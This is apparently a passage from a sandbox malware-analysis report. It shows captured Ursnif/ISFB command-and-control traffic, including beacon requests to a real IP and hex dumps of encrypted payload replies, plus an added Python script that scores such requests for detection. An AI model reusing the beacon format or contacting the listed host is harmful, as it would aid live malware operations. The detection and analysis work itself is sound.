              Data Raw: f7 46 fb 9e 69 b9 56 c0 85 b5 3c ae 3e aa 33 38 35 5a 64 d6 52 bc 42 12 16 86 d3 f7 ff 19 25 a1 c8 72 2b cd 25 8a 0f 08 f0 2e e4 61 ba 42 9d 9e ee 3c 23 65 bb 49 f2 14 21 9d 9f bb f8 74 45 7d af 3c 4f 96 e8 0c 62 35 ae 13 55 7f f4 5b 3e ec 33 8a 5f 02 aa 2c bb 78 58 74 91 ef b2 91 fc 07 b1 e7 58 01 16 72 83 2b 7e 5a 2e 22 8b 9a 65 0b d7 79 6e 0d e7 28 15 6a e8 b1 91 82 21 54 f1 42 d4 5c ed 5a 9c ad ca f0 37 09 c3 4d 66 b4 a8 3a bf 34 89 96 61 91 fe 08 92 fa 9f 07 60 20 f9 72 77 bb 00 7e de 0d c5 36 8a 15 d9 0b d3 65 62 da dc bf de 5f 75 31 c8 2c 19 59 bb a0 b5 1d cd 5a 5f a9 ef 87 62 5a b8 2f ac b2 11 ba 5a 0e 85 47 da bb e7 69 e5 5a c5 8c 7e 71 4d cc 84 0c ca 20 e6 fc ea e1 ae 33 29 98 ea 7b 38 ab f4 89 e3 49 13 e8 f4 12 e2 b3 55 2c 03 e7 b0 71 4f 4c c1 67 d4 2f 4e 58 7a 5c 7c c7 91 c9 1f fb a9 00 72 7d 9e aa ed 09 bb e1 ea 33 18 c0 d8 95 2f c5 62 25 0b 77 08 41 79 0e 45 9e d9 2b fe e2 ff e7 46 c5 3c 9c 66 88 d2 65 6f d2 88 5a d0 b6 ad 21 b8 01 78 29 d4 8a 06 b1 40 40 bf d5 3d f3 f2 e8 5a fd c5 52 a6 bc 72 a5 1d e9 fe ff 88 56 52 a7 51 8c 13 e5 cb c9 d4 8b 03 7f bb 74 fb ac d1 e1 00 d2 40 cc 15 62 fd 28 ae d8 34 fd 56 dd 6c 02 c9 38 19 2f ff df ce c5 7b 74 cc 44 3d 9c 38 ea 8d 3a 35 f4 c4 01 79 8e 45 d4 c5 dd 89 51 09 7b 3a eb c5 23 9a c6 b6 24 68 77 a9 fb b9 ae c7 ad ae 82 05 1d 78 53 91 a8 80 31 28 10 54 42 2d 2b 6d 56 81 77 61 22 86 c5 47 fa 9a 53 8d bd 63 91 d5 01 a2 1c 33 70 53 45 62 7e 67 68 c2 25 eb 66 32 05 09 0b 79 d2 23 03 03 d2 3a f3 73 e2 c6 5f a8 02 78 b2 d6 5a 2e 24 6e f7 81 5d c4 a4 f2 1e ac 17 c2 eb 88 10 41 7d 02 c7 f9 c0 47 f5 73 8f 0c 15 77 09 27 50 3f 4d fe 7e 88 cb 97 9f 1f 67 28 83 81 84 a1 4b cc 96 e8 d8 2d 77 d2 a0 35 fc 5c c9 39 b0 32 79 1a 79 fb 68 7b 42 34 f4 a9 bb bc 44 6d 8c 97 71 2c 08 c7 8b d8 96 27 1e ed 11 b0 15 a2 16 73 18 fa 7b 31 dc d6 47 5a 83 a7 86 a5 91 84 19 02 d8 99 1f dd 25 a2 3e ee 3a 57 9f 14 d7 0b 14 b4 c3 2e 0c 9c 1c 82 eb ef 3f 79 73 0a 6b c1 1f ff bd 61 83 96 43 15 24 7d 24 26 68 20 d0 0c 3a 
69 57 e7 84 4e 04 45 00 39 98 a6 0a 32 41 54 26 8d 78 f2 ab 3b 20 7c b5 42 eb 10 e5 6b 44 e5 f5 9a be d3 42 f8 16 75 bc 5c 2e e0 33 7b cd cd 80 de 28 00 da 8d 26 0e cd 12 fc df be f4 7e 62 e2 1f c9 41 c2 50 74 c5 ac 31 fe 87 d6 9a bf 2a 3b fb 54 1d 7c e4 24 56 54 21 51 52 66 d7 68 04 3e 8a 5e 97 4c fb 60 8d 6f 65 19 9a f8 b0 c4 e0 21 62 ae 1b 91 96 d0 e9 64 c9 94 39 68 9b bd ef 96 5f 8c 09 32 26 fd 16 ee f6 a3 da 2f e8 a6 e4 d5 3f 8b f0 32 ce cb bf 75 ae d3 3a 63 3b eb 80 90 73 e7 ec 24 40 94 f0 a9 2f b8 db d8 33 c3 16 a7 2f fe eb cf 3b 01 f2 b1 51 9b 60 07 8c 7b 63 93 44 26 8d b7 ef 24 46 1b 61 71 a9 6a eb 5b 7f 79 93 d7 d1 7e 0d ca f6 93 48 e2 b2 3b 0f 6f 05 94 5d 16 58 25 ef ea e5 ff 5b e9 01 84 71 a3 4b 17 20 2a 79 0f 12 7b 26 ff bd d7 56 cb 30 91 35 69 4b 0a b1 34 12 d6 cf d7 54 01 1a 9e f1 32 69 9c 1d 55 46 91 fb b5 55 b9 fc 09 6b c8 ae 5c 74 ed 69 bb fe 85 58 bc cd 3d 88 e1 f0 b3 4f cf 7b e6 41 a2 f0 7c 6f 76 01 1a 14 33 47 5c aa e1 b8 3d c9 81 d6 dc 23 8d 90 12 a3 b9 e1 ed 50 ab 0e 1b d9 f3 45
              Data Ascii: FiV<>385ZdRB%r+%.aB<#eI!tE}<Ob5U[>3_,xXtXr+~Z."eyn(j!TB\Z7Mf:4a` rw~6eb_u1,YZ_bZ/ZGiZ~qM 3){8IU,qOLg/NXz\|r}3/b%wAyE+F<feoZ!x)@@=ZRrVRQt@b(4Vl8/{tD=8:5yEQ{:#$hwxS1(TB-+mVwa"GSc3pSEb~gh%f2y#:s_xZ.$n]A}Gsw'P?M~g(K-w5\92yyh{B4Dmq,'s{1GZ%>:W.?yskaC$}$&h :iWNE92AT&x; |BkDBu\.3{(&~bAPt1*;T|$VT!QRfh>^L`oe!bd9h_2&/?2u:c;s$@/3/;Q`{cD&$Faqj[y~H;o]X%[qK *y{&V05iK4T2iUFUk\tiX=O{A|ov3G\=#PE
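The three requests in this session show the beacon shape that Ursnif/ISFB uses over plain HTTP: a fixed prefix (`/drew/`), a long run of pseudo-directories that is really one base64 string with `+` and `/` rewritten as `_2B` and `_2F` and slashes inserted at arbitrary points, a short fake file name with a configured extension (`.jlk`), an `MSIE 8.0` User-Agent on a `Windows NT 10.0` host, and an opaque `application/octet-stream` reply served under a hex-named `.bin` attachment. The following is an added example written for this page; it is not code from the Joe Sandbox report and not the malware's own code. It embeds the first request and the response head of this session as copied from above (response body omitted), undoes the path transform to recover the base64 blob, and scores the request on those traits. The scoring thresholds, the missing-`Accept`-header check, the `_3D` mapping for `=` (not present in this capture) and the helper names are the editor's assumptions; the recovered bytes are still ciphertext, and nothing on this page supplies a key.

```python
"""Triage of Ursnif/ISFB-style HTTP C2 requests and responses (added example).

Not part of the Joe Sandbox report and not Ursnif's code. SAMPLE_REQUEST and
SAMPLE_RESPONSE_HEAD are copied from session 0 of the report
(rundll32.exe -> 194.76.226.200:80); the response body is omitted.
Thresholds and the _3D mapping are assumptions.
"""
import base64
import re

SAMPLE_REQUEST = (
    "GET /drew/XCtMkJNFgr1wO/rqNQ0HN4/ZyJyvokVrq1cpfT_2FjRvTK/tLuchRhy61/"
    "VY2_2BDejax1_2FZ_/2B4hja3XPXEF/qOMgeh9PvPf/N8zQpyy6Zc5e9b/"
    "4QO0R4yS5UCD1QFYshJGy/yTzTKH0fh7Ht9Zwy/6rUgxnlS7Il_2Fi/FA0gREqRHLz3XsH5AC/"
    "GH2iS6XmT/92F7y362W9gTjtIUfvoo/J_2Bt2_2BThMLoUrTFI/Ys7KyYaIys_2B6FXPvybrX/"
    "6Ff.jlk HTTP/1.1\r\n"
    "Cache-Control: no-cache\r\n"
    "Connection: Keep-Alive\r\n"
    "Pragma: no-cache\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)\r\n"
    "Host: 194.76.226.200\r\n\r\n"
)

SAMPLE_RESPONSE_HEAD = (
    "HTTP/1.1 200 OK\r\n"
    "Server: nginx/1.18.0 (Ubuntu)\r\n"
    "Content-Type: application/octet-stream\r\n"
    "Content-Length: 205974\r\n"
    "Content-Disposition: inline; filename=\"61f1142aa1068.bin\"\r\n\r\n"
)


def parse_head(raw):
    """Split an HTTP head into (start line, {lower-case header name: value})."""
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def recover_base64(path):
    """Undo the ISFB path transform and return the decoded bytes, or None.

    Drops the one-segment prefix ("drew", an assumption about this config)
    and the trailing ".ext", removes the slashes inserted into the encoded
    string, and maps _2B/_2F/_3D back to the base64 characters + / =.
    """
    body = path.rsplit(".", 1)[0]
    body = "".join(body.split("/")[2:])
    body = body.replace("_2B", "+").replace("_2F", "/").replace("_3D", "=")
    body = body.rstrip("=")
    if not body or len(body) % 4 == 1:   # empty or impossible base64 length
        return None
    body += "=" * (-len(body) % 4)
    try:
        return base64.b64decode(body, validate=True)
    except ValueError:                   # binascii.Error is a ValueError
        return None


def triage_request(raw):
    """Score a request head for Ursnif C2 traits; returns the feature dict."""
    start, h = parse_head(raw)
    method, path, _ = start.split(" ", 2)
    blob = recover_base64(path)
    ua = h.get("user-agent", "")
    f = {
        "method": method,
        "segments": len([s for s in path.split("/") if s]),
        "encoded_slash_plus": len(re.findall(r"_2[BF]", path)),
        "base64_ok": blob is not None,
        "decoded_len": len(blob) if blob else 0,
        # a 16-byte multiple is what a block-cipher payload looks like
        "block_aligned": blob is not None and len(blob) % 16 == 0,
        # IE8 never shipped on Windows 10: the UA string is fabricated
        "impossible_ua": "MSIE 8.0" in ua and "Windows NT 10.0" in ua,
        "no_accept": "accept" not in h,
    }
    f["score"] = sum([
        f["segments"] >= 8,
        f["encoded_slash_plus"] >= 1,
        f["base64_ok"] and f["block_aligned"],
        f["impossible_ua"],
        f["no_accept"],
    ])
    f["suspicious"] = f["score"] >= 3    # threshold is an assumption
    return f


def triage_response(raw):
    """Flag an opaque binary reply delivered under a hex-named .bin file."""
    _, h = parse_head(raw)
    name = re.search(r'filename="?([^";]+)', h.get("content-disposition", ""))
    return {
        "octet_stream": h.get("content-type") == "application/octet-stream",
        "hex_bin_name": bool(name and re.fullmatch(r"[0-9a-f]{10,}\.bin", name.group(1))),
    }


if __name__ == "__main__":
    print(triage_request(SAMPLE_REQUEST))
    print(triage_response(SAMPLE_RESPONSE_HEAD))
```

Run as a script it prints the feature dicts for the session-0 exchange: the path recovers to a 176-byte blob (a multiple of the 16-byte block size), all five request traits fire, and the reply is an octet-stream under a 13-hex-digit `.bin` name. A plain `GET /index.html` with an `Accept` header and a current browser UA scores 0, which is the point of combining several weak traits instead of matching on the prefix alone, since the prefix and the extension are per-campaign configuration.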


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              1 | 192.168.2.3 | 49753 | 194.76.226.200 | 80 | C:\Windows\SysWOW64\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 26, 2022 10:28:10.427335024 CET | 1109 | OUT | GET /drew/2f3T6_2Fldpw_2BA6Engti/ap9anBYrptHHy/xCGyvO5i/wYPccsVOVAKMkuNvsUxMYE4/RkZB4YqLqe/XacN1M_2FaB24Ib2R/hVRxOozHufuZ/c6WQY_2FOGu/wQlIyAdYSezuQl/ojNT2IxdKraylKm035Q_2/FdvJBuYlSvhCsegR/oboSzu_2BtJ_2BW/XMLPOefEKMYQuO_2B_/2FNWtFwdl/dQERZJKq6wr_2FxRn8R5/MLhj_2Fz9ge97_2BBFz/rUr1Agrx59/b.jlk HTTP/1.1
              Cache-Control: no-cache
              Connection: Keep-Alive
              Pragma: no-cache
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
              Host: 194.76.226.200
              Jan 26, 2022 10:28:10.705521107 CET | 1152 | IN | HTTP/1.1 200 OK
              Server: nginx/1.18.0 (Ubuntu)
              Date: Wed, 26 Jan 2022 09:28:10 GMT
              Content-Type: application/octet-stream
              Content-Length: 205974
              Connection: keep-alive
              Pragma: public
              Accept-Ranges: bytes
              Expires: 0
              Cache-Control: must-revalidate, post-check=0, pre-check=0
              Content-Disposition: inline; filename="61f1142aa843f.bin"
              Data Raw: 0b 34 4a a5 90 0e c7 6f 93 f0 c9 9c 13 02 b2 b5 cc 76 30 92 6d 0e 22 4f c9 58 34 d7 fe b5 ba b7 5a ab 0e a3 52 08 62 4c 78 fd 91 22 35 10 c2 d3 61 1c 83 02 81 d8 3b c6 4c 9f eb b4 93 cc 31 0c 68 76 c0 57 f4 7b a4 04 53 d7 14 5d 88 7d 03 7f 09 50 4e 57 7a 07 db 05 d1 c4 36 78 ca 9d 10 4e ac a5 10 d0 07 02 c5 07 66 1b 6c 2b 79 30 7f 1d 61 fa ac 7f 36 be 4a 04 de 90 63 1a 5b eb 1a 72 1b 4f 2b 13 db 9c e2 df ae bc dc b0 ca 11 68 65 0d 38 ae be 00 a2 bd de 57 9d 31 ab 78 b9 89 12 36 b3 5a b7 d9 1b df fc 64 47 88 e6 91 15 96 e3 4d b2 e6 5f d6 d8 58 8f 3a b2 67 59 28 e5 38 d6 f3 d4 ec c8 10 cb 0f 32 41 a7 2a d0 1f 18 bc 53 77 e0 20 7c d9 e5 cf 26 82 51 e7 3e 03 7e 6e fa 82 c6 5a 4f 55 0d 03 d4 ae bf c0 d0 28 38 d8 07 65 cf 62 68 a7 c1 c1 d1 04 9c 39 0e 98 08 1e 90 cd 54 de 73 d1 7d 48 94 0f e7 c3 6f 7a 6f 11 8f bb 47 84 66 c5 95 8c 15 cd ea 00 37 32 9a 90 18 45 54 38 b7 be e8 a1 cc 90 1b 98 f1 f7 5a 39 ed 58 2e 04 21 85 12 70 7e 32 24 af ae 9e fb f0 56 71 b6 4f 4b db 22 16 8a 68 b9 da ae 4c a4 5e 8a 77 c8 50 57 04 fc 36 4d c9 28 17 cc a9 81 22 5d 70 7d 9c 4d 02 d1 7b 80 bb 0b e2 ca 73 5a 01 64 06 8f 11 cb 55 51 80 c1 18 c1 c9 38 11 f1 13 d6 39 8d df 7c c4 5e 86 65 c8 35 0a 13 62 48 d7 63 b1 c8 c7 a1 4f f7 6d 06 b5 57 50 fd 27 7b e8 0c 6a 1e 71 3c 3d d8 b8 0e 92 d2 51 19 3e 30 75 20 1f f4 aa 5f a3 2e 32 8a 0d a5 9f 80 7f fd 5b 6a 34 7b 2f 49 f0 28 0b 2b 1b 91 d8 0c 02 6b 60 96 ca 7c 5b 3f f2 0e 4e e1 a6 3a 7d a3 b6 31 11 ca 38 ad 77 4f 69 88 5b d8 dc 1c 50 fc 43 23 dd 4f 28 ab 4b 83 97 d9 83 86 37 d4 35 ee de 1e ed 9f 4b dd 00 a3 72 52 c7 27 04 4d 81 eb e9 ec 96 aa f9 2e 3f 42 c9 06 71 55 3b ac 74 d6 c3 51 95 7c a9 88 a1 29 cd 87 8b 8d 91 80 c2 27 be 0a 9a 79 c4 71 2f 66 cd 0d 8f ea 0b 71 9c 31 65 9c b4 71 c7 83 db 73 ef 97 72 58 6b ec 28 a0 a2 3d 78 f2 60 48 bd de f7 4d 89 e4 48 56 c7 c7 33 40 4f cd 43 22 8e e4 4d 45 8d 73 df 8f 3b 90 ff 56 18 e1 52 36 d5 ad bd 2c e6 ab d4 98 46 02 74 39 79 e3 9d 17 d0 64 90 67 45 46 51 f1 67 82 66 1f 8c 5d 2f d4 
55 75 55 00 e1 f5 7d bc b1 1d dc e3 cb 0d 0f 1d 20 b2 78 4b 19 50 9b 9d 80 05 ad 82 b1 4a 3d a9 c6 8d db f6 d1 40 f3 1a 7f 08 ee 73 12 77 8d f0 26 11 a9 d2 b2 53 5f cd 10 a7 56 ee 93 fb 29 64 a4 0d 0c 5a b7 dd f2 4d d8 ac d3 2e 26 e7 8b 9b 7a b8 46 13 e9 c5 1c a2 84 04 46 b6 03 bc dc 61 89 60 bc 13 9e 91 fa d6 f3 ea 0d 74 f1 38 9b 17 fd 5a 50 d8 4f 55 d3 bd f2 87 17 1a 66 8d 83 19 72 7f 9a 6d 49 86 65 84 7a 01 74 85 b2 c3 1d 24 dd 41 ae c5 26 a2 88 c2 f8 ee 1f 8b 69 75 6d 97 da 41 2d 1c 40 fb 6c 84 ee 4e cc e2 be 87 77 6e 71 f8 6c c4 5c 80 74 ca 68 f2 43 f6 3b ab 9d e3 3a 5f d2 44 73 0e be 3b 81 44 26 a5 16 3f 25 ba af e4 df 06 9c 06 17 77 74 07 91 08 54 dd 3d 33 1d 89 0b 05 11 e2 e7 cc 35 63 3d 83 27 fc 18 6e 35 dc 0e 03 ac 48 0e c6 06 d7 2c fe 39 2e 2a a3 29 3c ed c6 e5 88 ea bc 33 77 d9 07 43 16 a8 a3 36 e1 64 5a 40 a3 c8 50 1f fc a8 1d dc 70 3f 8f 91 29 e5 46 82 3a 29 d0 07 c8 e2 80 2b f0 30 a3 39 18 0e b1 c8 d9 db 90 7d 26 dd 91 2f f6 8e 45 3e 1b 26 e1 6f 5b 1f 0b f1 b9 12 d0 62 7e 46 46 19
              Data Ascii: 4Jov0m"OX4ZRbLx"5a;L1hvW{S]}PNWz6xNfl+y0a6Jc[rO+he8W1x6ZdGM_X:gY(82A*Sw |&Q>~nZOU(8ebh9Ts}HozoGf72ET8Z9X.!p~2$VqOK"hL^wPW6M("]p}M{sZdUQ89|^e5bHcOmWP'{jq<=Q>0u _.2[j4{/I(+k`|[?N:}18wOi[PC#O(K75KrR'M.?BqU;tQ|)'yq/fq1eqsrXk(=x`HMHV3@OC"MEs;VR6,Ft9ydgEFQgf]/UuU} xKPJ=@sw&S_V)dZM.&zFFa`t8ZPOUfrmIezt$A&iumA-@lNwnql\thC;:_Ds;D&?%wtT=35c='n5H,9.*)<3wC6dZ@Pp?)F:)+09}&/E>&o[b~FF
              Jan 26, 2022 10:28:10.705549955 CET | 1154 | IN | Data Raw: 41 1e fe e1 f1 ae a3 57 10 dd a0 5a ca b8 50 30 d7 31 ea b4 01 7d c2 91 09 08 ce 9b d1 e6 ae 6c fd 9e da 16 2a 6a 80 64 7f 63 cb 76 b1 e5 70 b3 4b ee ae 74 a8 07 13 22 4b 4d e3 26 0a 0e bb b8 51 ea 8f 9e 44 a0 8d 09 23 0d 24 94 39 77 f8 a2 f1 be
              Data Ascii: AWZP01}l*jdcvpKt"KM&QD#$9w"rh=EMw Xxc0~QSmdo8-3eehDx9p1;xt0ccU_n9G~X$$Z~W/sQwI9R:(Ka>k
              Jan 26, 2022 10:28:10.705574989 CET | 1155 | IN | Data Raw: 0a ca f3 c8 64 af b7 9c 50 26 44 70 2c 49 ff fe 67 7c 2b 05 27 83 9d ca d1 41 18 02 0a 1a 69 be 8a 10 be 39 ff 50 5e cb 38 a1 51 e9 b8 25 c3 da 00 ce b2 d3 11 05 ff ac ef cd 0f 59 9b ac 6d e0 09 ff 46 68 14 b7 81 d5 da 21 d7 10 14 ba f5 d7 a3 71
              Data Ascii: dP&Dp,Ig|+'Ai9P^8Q%YmFh!q%KNZ6uFY-]_;D[V`>l0&}Lc{+%L9",~uGKU/N^lNw3b3HU/]0e:$A}D"KJ
              Jan 26, 2022 10:28:10.705594063 CET | 1156 | IN | Data Raw: ca 39 82 32 ae 72 18 43 1c dd fd 9b ed f6 51 8d ab c6 11 93 a3 20 6e 4b 45 a0 05 a1 80 3f 8d 61 0c 33 55 27 ba 6c 58 57 e5 a2 d4 6a f3 b3 69 e0 3e 0d bb 52 e4 78 c8 75 a6 a1 3c c3 1b 3b d0 ab c4 67 e2 1f 96 3e fb 45 87 8a a9 92 b9 41 ab 64 84 02
              Data Ascii: 92rCQ nKE?a3U'lXWji>Rxu<;g>EAda!i6MT%s9WBIRn<mywgVS*;N+0Ne"D+4`_8K7{g<T<FJ. 7H/=}
              Jan 26, 2022 10:28:10.705621958 CET | 1158 | IN | Data Raw: 2f da e6 93 1c a7 c9 16 59 cf 4e 4e ad 91 65 c2 8a da 4b be d1 0c bc de 95 69 0b 8a 07 73 b2 86 1d cf 52 a3 44 c3 a2 5d 4a 22 1c c1 7c 10 9d 26 f5 e4 e3 96 0f 93 73 85 b6 92 35 64 27 a7 d9 16 0d 58 c3 ff 09 4c c5 6f 63 9a ce 1a 10 a7 b6 d1 97 58
              Data Ascii: /YNNeKisRD]J"|&s5d'XLocX'|RQy4MoPg37L_>2dZ}5xNYg'uP]YgH8+6uwHZ@F,D]y]4-d5VpBmKK
              Jan 26, 2022 10:28:10.705637932 CET | 1159 | IN | Data Raw: 2b 1d da c2 1d 24 4b f5 b5 ea a5 b2 62 ea 22 a0 72 b6 c7 3a cd dd 7a a3 b2 48 b4 c1 0a 16 9b b3 2b b2 92 14 9d f2 6d 4b 94 43 6a 10 36 cf 56 b9 06 d7 99 90 a6 6d 24 a6 71 8b 1c 56 02 7c 48 0e 94 7c 42 8a 13 68 47 5f 9a 99 f1 fa 2a 72 3a 87 da 1c
              Data Ascii: +$Kb"r:zH+mKCj6Vm$qV|H|BhG_*r:!>QBE.}fS.%;$-<*@_yV1aio /{-0D<mzC.HRto.N,/UjV#|G=XHjpG>Kt<]B
              Jan 26, 2022 10:28:10.705718040 CET | 1160 | IN | Data Raw: 3a 5c 45 2a fe db 99 e8 c3 fe 61 44 7a e7 f7 ef 0c 17 e0 d7 65 eb e4 80 70 32 e8 72 16 e7 dd 93 ba b3 f2 d4 b3 1a 70 b9 04 67 92 ab 70 29 f5 4b 2b d9 ad 6d 6f f5 a9 5a 41 33 14 50 da f9 d4 2e 7b 4f 8e 4b 43 d8 b4 b6 22 42 53 b1 f2 70 6d c6 53 59
              Data Ascii: :\E*aDzep2rpgp)K+moZA3P.{OKC"BSpmSYfXo|u_vMGht\mu0QRNuegGi|r45!Z2EYoa5n)
              Jan 26, 2022 10:28:10.705913067 CET | 1161 | IN | Data Raw: 1f 46 dd 39 6a e7 ee f5 53 dc 9b 06 ac 90 d4 3b 67 ae 1b c1 52 b2 50 76 d3 e8 37 e1 a6 db 59 88 06 5a 11 85 02 ec 0d ea 01 33 81 bf e6 76 e2 96 d7 26 1d f3 32 ab 6c 59 68 42 c2 e1 f6 80 ba bc 63 e4 e6 31 d8 7a 89 b4 fa a7 59 58 62 d8 c3 4e fd d9
              Data Ascii: F9jS;gRPv7YZ3v&2lYhBc1zYXbNIbt]rDxY3-vmua{eiwcU3){_+r$1B|2iR?}_.B`T>1KR8K vvw%/yN+@|cxgR
              Jan 26, 2022 10:28:10.705933094 CET | 1162 | IN | Data Raw: 98 2c d9 b4 4e f3 68 58 f9 0e ab 80 69 3b ef 41 53 03 60 a4 6f 2d ca b3 91 be f8 e0 06 cc 2b 9c 3e 70 83 bb 26 bb db b3 f9 4d 08 88 74 1c e6 4f d7 36 2b 72 01 1e d8 a8 7d cc 2e 91 a2 b1 ba 25 8b 83 40 cf fe 89 83 9a 85 e6 ad 57 67 3e 26 a7 36 1d
              Data Ascii: ,NhXi;AS`o-+>p&MtO6+r}.%@Wg>&6`8~ZCs?O23d!,!w(E3AHNc+xYw!3't3-!Rs;~p)T9;yEu\A>;CR%2f=`A
              Jan 26, 2022 10:28:10.706017971 CET | 1164 | IN | Data Raw: c1 88 d1 4b d7 fa 8f 60 1a a7 4c fd 83 e2 de 6d 85 53 29 12 be f7 e5 8f 0f 90 6a 0b 0c 82 3f f7 5d 96 02 48 71 95 08 d4 66 07 a7 a6 a4 e6 f5 8f 84 21 7c 96 8f d6 c2 65 10 44 84 a6 d9 01 2d 90 3a 9d e2 8b 40 6e d9 c3 bb 1a 50 65 80 f1 e7 5f c0 3a
              Data Ascii: K`LmS)j?]Hqf!|eD-:@nPe_:42\)%uu{{d\{x<J/InJ<0%GWc(x8aHH:grs'w9Xf>C"+F/3"csi\gy4uJ!iZj[
              Jan 26, 2022 10:28:10.725728035 CET | 1220 | IN | Data Raw: 4e 21 85 2d 19 14 20 8f a4 df 90 16 75 d9 f0 db 92 b5 d1 99 25 b8 71 b8 e2 fb 02 95 4f 85 58 01 6b 41 c7 e0 22 cc 72 ea f2 cf 73 8c 2a 89 cb 20 26 2c cf 12 a2 8f 4a 58 5c 42 41 94 c1 af dd 3f b5 a7 a7 54 2b e7 54 b9 1c 3c 4c 42 5e 50 ee 5a 8d 04
              Data Ascii: N!- u%qOXkA"rs* &,JX\BA?T+T<LB^PZwk~x,GH'dlyndS\>znPtx]<`N__N2J<'$8J@"`Z30E:Z68IwQPc1ypYKq,4yZYY"D!s@Yu \rx5<{
              Jan 26, 2022 10:28:10.883430004 CET | 1760 | OUT | GET /drew/1sAtgPIBWWyXis_2FA/6GIdiDz41/F8DsJCsC5dAiiAp40xO_/2FPXx_2BF1qO46g3cTx/u5HuMo3uztxcUiL23t82FF/kkG2LxXPj08tg/H_2BJGnO/cP97dD1bDaB8ARH5ISgaEh8/3o1VSIlvAE/fAY7fRQsRaiXUwpok/xVsDrvhLU9b_/2FX5Wo3hVjQ/iMxJEhzERdYzAI/_2F44rqzPuWQ9p1F4Yhmb/gVtKSgiFTUu0Sz_2/FYShPBpN48b/U_2FavA.jlk HTTP/1.1
              Cache-Control: no-cache
              Connection: Keep-Alive
              Pragma: no-cache
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
              Host: 194.76.226.200
              Jan 26, 2022 10:28:11.158659935 CET | 1763 | IN | HTTP/1.1 200 OK
              Server: nginx/1.18.0 (Ubuntu)
              Date: Wed, 26 Jan 2022 09:28:11 GMT
              Content-Type: application/octet-stream
              Content-Length: 262298
              Connection: keep-alive
              Pragma: public
              Accept-Ranges: bytes
              Expires: 0
              Cache-Control: must-revalidate, post-check=0, pre-check=0
              Content-Disposition: inline; filename="61f1142b22c19.bin"
              Data Raw: bc 58 44 2d 3f 69 1c 31 6f 19 ce bd 43 f0 20 48 2f a8 05 9b 0e 7a 3e 20 f1 f5 39 03 5c ec 25 14 47 ca 20 58 0c 21 39 da 11 c2 cf 7d ea e9 bd e0 29 31 a9 65 5b 07 36 21 bc bd 3c 8d 80 a7 96 dd 76 86 90 74 45 b9 fa 0c 05 46 10 a3 e9 f0 9a 00 ca 11 6e 65 f9 dd 9d 9e 33 63 61 96 0d 7f bc 6d 8d a8 fa 74 5b 85 1f 03 07 2f 96 87 82 0b c0 50 5b e2 9b 0f 15 ef 3a 18 83 ed 78 e9 24 bd d5 50 65 eb d4 69 41 35 6c 8b 36 81 b0 b7 83 87 f2 99 9c dc 14 4c 1a 9e 39 2a 93 cb 6a 9f b7 da 70 12 ff f3 e9 54 c1 a0 da e7 c8 3b cd 2b 9e 48 f8 94 94 82 5c 2e 01 04 3b ba cd a4 44 0b d1 57 48 d1 40 8a 69 00 8a 79 dd 8d 7f 68 fe db 65 87 08 d5 9d 19 70 c1 d2 12 63 26 8d b8 8f eb e2 d4 f6 0c 7d bc 55 af 67 0e 49 6d 0e b0 bd d1 80 06 ea 38 2b 65 3b 8e 6a 76 d7 f7 89 2e 85 0a c9 be b2 8c 42 42 4f 7b 28 2c 6d 27 b9 7b cc 91 47 6f 1f 88 98 1e 3e d4 28 68 c2 c6 76 65 3d 09 3a a5 72 b4 46 f1 e0 d2 94 e7 57 7c e8 19 8c 31 83 ce 83 e7 97 ce 0d 51 ff c2 23 5d df 8e 64 07 b2 10 d9 cf 61 82 c5 34 79 bc fd f2 a6 c1 4e ef 21 d0 c9 a8 a5 ac 9c ad c4 94 e9 f2 fb a7 38 f6 f7 3f ce 80 69 78 cd 93 be d3 de a3 10 69 6a 51 2d 59 9a 13 e0 53 b1 6f 72 a4 e1 7f b3 90 b1 fc d9 aa 59 bc 59 97 82 64 99 0b ac a8 04 bd 04 4c b6 24 de 0d 53 fe 01 a3 13 6e d8 22 78 59 53 fe 95 18 0c 81 d7 5f 8a cd 05 69 1c 65 4a 9b 24 46 06 ac fb 49 9d de 37 60 ae ee c6 6b 29 02 6c 0e a1 3b e0 0e 43 a4 1b 5b 9b c0 e8 8d 54 45 de 9a d1 7b 85 30 17 70 2e 5e fa d1 ea 55 b7 09 4a 45 19 fd 62 7d d2 c2 37 e1 59 70 cb cb f0 59 12 f6 21 3d f8 f7 9e e0 e8 e5 02 1e 2a 2d a8 96 a4 77 f2 5a 2a ef d7 3e 65 47 a9 bb 0f ac db c5 65 7c 27 de b3 3a c9 4a 7a f7 24 47 cf f8 cd e4 d7 14 66 55 28 59 d9 9a d7 12 6e a0 84 de a0 76 b4 cc c5 48 c8 d7 da ed f3 f6 89 a3 23 08 7a d6 31 49 1b e9 e7 f5 6d ad ef 63 c9 09 43 4d d4 6e 47 18 ac 32 2b 65 3e 82 1d 23 61 ac 1b a2 06 be 9d 19 7b 20 df cf 5a 03 ac 9d 11 d3 47 69 f2 af ce 4b ad a1 ef 2b fc 8e 36 0b db d3 e8 4b cd 90 d7 c4 92 08 94 9b ae 29 f1 7f 1c f8 80 24 55 8b 13 76 d8 9f 21 95 73 57 
a8 e4 ad be 38 75 6d fc 51 42 da 45 01 ce be a8 8e bf 1c 27 2d 78 d4 11 a5 de 6d 95 43 00 61 1a 51 12 77 fa b9 66 a5 85 6e 81 9b e4 d6 d3 38 f2 eb 8f 6f 53 50 e7 b4 4f a0 f6 69 88 5b 7b c9 03 a4 02 a7 22 52 c6 cd ec d7 dd 58 53 72 01 a5 ea 13 88 ee ef 11 74 a2 bb a7 5a c3 df 31 00 6b ae a5 2c 3e 2d ae 96 ac 4e 83 f7 22 7b 95 a1 31 5a 5d cb ec cc 1a 30 9a c8 2e c3 ed d6 0e fe 52 10 aa d4 ef 89 c6 37 cf fa cd ec c6 8e 8b 1c 5c 25 7c fd 28 86 e8 72 01 b6 e2 94 96 0a 71 4f 83 2d 17 55 15 40 67 58 d8 63 b4 d1 ac 11 2e 37 21 1c 87 20 31 1f 0c 46 58 bb bd ac 41 e6 de 27 05 ca 9c 2d 48 d8 ef 9a e1 71 92 d6 32 99 0d 05 06 b5 45 8e 7a b5 1d b6 89 fa 46 1a e3 d4 79 21 b8 92 e5 c3 80 40 10 5d 85 c8 10 a5 41 c9 0e c6 a2 34 a1 fe 